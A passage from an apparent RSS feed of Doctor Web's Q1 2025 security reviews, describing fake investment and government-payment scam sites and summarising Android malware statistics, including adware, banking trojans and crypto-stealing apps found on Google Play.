    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/21_scam_10kapp_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/21_scam_10kapp_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    At the same time, users continued encountering fake investment-themed websites targeting residents of different countries. 
    For example, for an audience from Kazakhstan, fraudsters prepared yet another platform for earning passive income through oil and gas trading:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/22_scam_kaz_passive_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/22_scam_kaz_passive_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Many other sites offered the opportunity to “earn as much as possible” by trading shares of companies in Kazakhstan, Russia, China, and other countries:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/23_scam_kaz_more_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/23_scam_kaz_more_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/24_scam_kaz_more_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/24_scam_kaz_more_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Russian and Kyrgyz residents also encountered similar websites; on these, users allegedly could make money by trading oil and gas:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/25_scam_kyrgyzgaz_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/25_scam_kyrgyzgaz_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/26_scam_russiagaz_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/26_scam_russiagaz_q1_2025.PNG" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    And one scam Internet resource offered Romanian users the chance to join the BRUA pipeline project, promising 3,000 lei per week as passive income:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/27_scam_romania_brua_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/27_scam_romania_brua_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Sites that promise government support to the population in the form of benefits, social payments, etc., remain a lure for potential victims. 
    Threat actors, for instance, tried to bait Russian users with more fake &lt;em&gt;Gosuslugi&lt;/em&gt; web portals. One asked them to provide personal 
    data—supposedly to participate in an oil and gas company payment program and also to receive bonuses from the government:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/28_scam_fakegosuslugi_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/28_scam_fakegosuslugi_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Another scam site promised every Kazakhstan resident assistance in the form of money payments. It was allegedly organized on behalf of a large bank to “avoid problems and disasters”:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/29_scam_kaz_fakepayments_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/29_scam_kaz_fakepayments_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Fake investing service websites, including those supposedly belonging to Russian credit organizations, are still a problem. 
    Many of them mimic real bank websites in order to confuse potential victims as much as possible.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/30_scam_fakebank_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/30_scam_fakebank_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/31_scam_fakebank_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/31_scam_fakebank_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Examples of fake Russian bank websites offering access to “investing services”
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;&lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h2 class="alignCenter"&gt;Malicious and unwanted programs for mobile devices&lt;/h2&gt;
    &lt;p&gt;
      According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q1 2025, 
      &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 
      ad-displaying trojans, along with &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious fake programs, were the Android 
      threats most commonly encountered; their activity increased, compared to the last quarter of 2024. In addition, users increasingly encountered 
      &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans. In contrast, &lt;b&gt;Android.SpyMax&lt;/b&gt; 
      spyware trojans, whose attacks increased in number almost every month in 2024, were detected less frequently.
    &lt;/p&gt;
    &lt;p&gt;
      Our specialists once again discovered many threats on Google Play. Among them were trojans used in various fraudulent schemes, 
      cryptocurrency-stealing malware, and adware trojans.
    &lt;/p&gt;
    &lt;p&gt;The following Q1 2025 events involving mobile malware are the most noteworthy:&lt;/p&gt;
    &lt;ul&gt;
      &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojan activity increased.&lt;/li&gt;
      &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojans were more active.&lt;/li&gt;
      &lt;li&gt;The number of &lt;b&gt;Android.SpyMax&lt;/b&gt; spyware trojan attacks declined.&lt;/li&gt;
      &lt;li&gt;New threats were discovered on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;
      To find out more about the security-threat landscape for mobile devices in Q1 2025, read our &lt;a href="https://news.drweb.com/show/review/?i=14991&amp;lng=en" target="_blank"&gt;special overview&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14991&amp;lng=en</guid><title>Doctor Web’s Q1 2025 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=14991&amp;lng=en&amp;c=9</link><pubDate>Thu, 27 Mar 2025 00:00:00 GMT</pubDate><description>



&lt;p&gt;&lt;b&gt;March 27, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, ad-displaying &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans remained the most common Android malware. Moreover, they were detected on protected devices more than twice as often as in the fourth quarter of last year. Second place once again went to &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malware, which cybercriminals use in various fraudulent schemes—their activity increased by almost 8%. Adware trojans from the &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; family ranked third; the number of their detections almost quintupled.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Similar dynamics were observed among many banking trojans. For instance, an increase was recorded in the number of attacks involving 
        &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; trojan family members—by 20.68% and 151.71%, respectively. At the same time, &lt;b&gt;Android.SpyMax&lt;/b&gt; 
        trojans, whose activity grew throughout almost all of 2024, were detected 41.94% less frequently than in the previous quarter.
    &lt;/p&gt;
    &lt;p&gt;
        Over the past 3 months, Doctor Web’s specialists discovered dozens of new threats on Google Play. Our virus laboratory’s findings in 
        this catalog included cryptocurrency-stealing malware and other trojans that display intrusive ads, along with the traditionally large 
        number of &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans.
    &lt;/p&gt;
    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS OF Q1 2025&lt;/h4&gt;
        &lt;ul&gt;
            &lt;li&gt;Increased activity on the part of adware trojans&lt;/li&gt;
            &lt;li&gt;Increased numbers of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banker malware attacks&lt;/li&gt;
            &lt;li&gt;Decreased activity on the part of &lt;b&gt;Android.SpyMax&lt;/b&gt; spyware trojans&lt;/li&gt;
            &lt;li&gt;The emergence of many new threats on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h2&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/01_malware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/01_malware_q1_2025_en.png" alt="Malware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/02_unwanted_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/02_unwanted_q1_2025_en.png" alt="Unwanted_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/03_riskware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/03_riskware_q1_2025_en.png" alt="Riskware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps into which it is integrated. The APK files launched with the help of this platform can operate as if they were part of such programs and can also obtain the same permissions.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to alter their logic or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To apply patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to the shared database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/04_adware_q1_2025_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/04_adware_q1_2025_en.png" alt="Adware_Stat_Q1_2025"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for some modified versions (mods) of the WhatsApp messenger into whose functions specific code has been injected. This code loads target URLs by displaying web content (via the Android WebView component) while the messenger is in operation. Such web addresses redirect to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Basement.1&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;These are apps that display unwanted ads which often lead to malicious and fraudulent websites. They share a common code base with the &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; unwanted applications.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Fictus&amp;lng=en"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An adware module that malicious actors embed into the cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="gplay"&gt;
    &lt;h2 class="alignCenter"&gt;Threats on Google Play&lt;/h2&gt;
    &lt;p&gt;
        In Q1 2025, Doctor Web’s virus laboratory detected several dozen malicious programs. Among them were various modifications of the trojans 
        &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4215&lt;/b&gt;, which conceal their presence on infected devices and 
        start displaying ads on top of other apps’ windows and the operating system UI. They masqueraded as software for taking photos and videos 
        with different effects, image-editing programs, an image collection app, and a women’s health diary.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/05_Android.HiddenAds.4213_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/05_Android.HiddenAds.4213_q1_2025.png" alt="Android.HiddenAds_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/06_Android.HiddenAds.4215_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/06_Android.HiddenAds.4215_q1_2025.png" alt="Android.HiddenAds_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans concealed in the apps “Time Shift Cam” and “Fusion Collage Editor”
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Our specialists also discovered &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.202&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.203&lt;/b&gt;, and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt;, malicious programs designed to steal cryptocurrency that are distributed under the guise 
        of official software from the Raydium and Aerodrome Finance blockchain platforms and the Dydx cryptocurrency exchange.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/07_Android.CoinSteal.202_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/07_Android.CoinSteal.202_q1_2025.png" alt="Android.CoinSteal_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/08_Android.CoinSteal.203_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/08_Android.CoinSteal.203_q1_2025.png" alt="Android.CoinSteal_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        The “Raydium” and “Dydx Exchange” programs are trojans that steal cryptocurrency
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        When launched, these malicious apps ask potential victims to enter a mnemonic phrase (the seed phrase)—supposedly to connect their crypto wallet. 
        But, in reality, the data that users provide is sent to threat actors. To further mislead users, forms for entering mnemonic phrases can be disguised 
        as requests from other crypto platforms. As shown in the example below, &lt;a href="https://vms.drweb.com/search/?q=Android.CoinSteal&amp;lng=en"&gt;&lt;b&gt;Android.CoinSteal&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.206&lt;/b&gt; 
        displayed a phishing form allegedly on behalf of the crypto exchange PancakeSwap.
    &lt;/p&gt;
    &lt;div class=" flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/09_seed_q1_2025.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/09_seed_q1_2025.1.png" alt="PancakeSwap"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/10_seed_q1_2025.png" class="preview"&gt;
              &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/10_seed_q1_2025.1.png" alt="PancakeSwap"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p&gt;
        At the same time, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs were once again being distributed via Google Play. 
        Fraudsters passed off many of them as finance-related software, including teaching aids, tools for accessing 
        investment services, and personal finance software. They loaded various phishing websites, including those used by threat actors to collect personal information.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/11_Android.FakeApp.1803_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/11_Android.FakeApp.1803_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/12_Android.FakeApp.1777_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/12_Android.FakeApp.1777_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
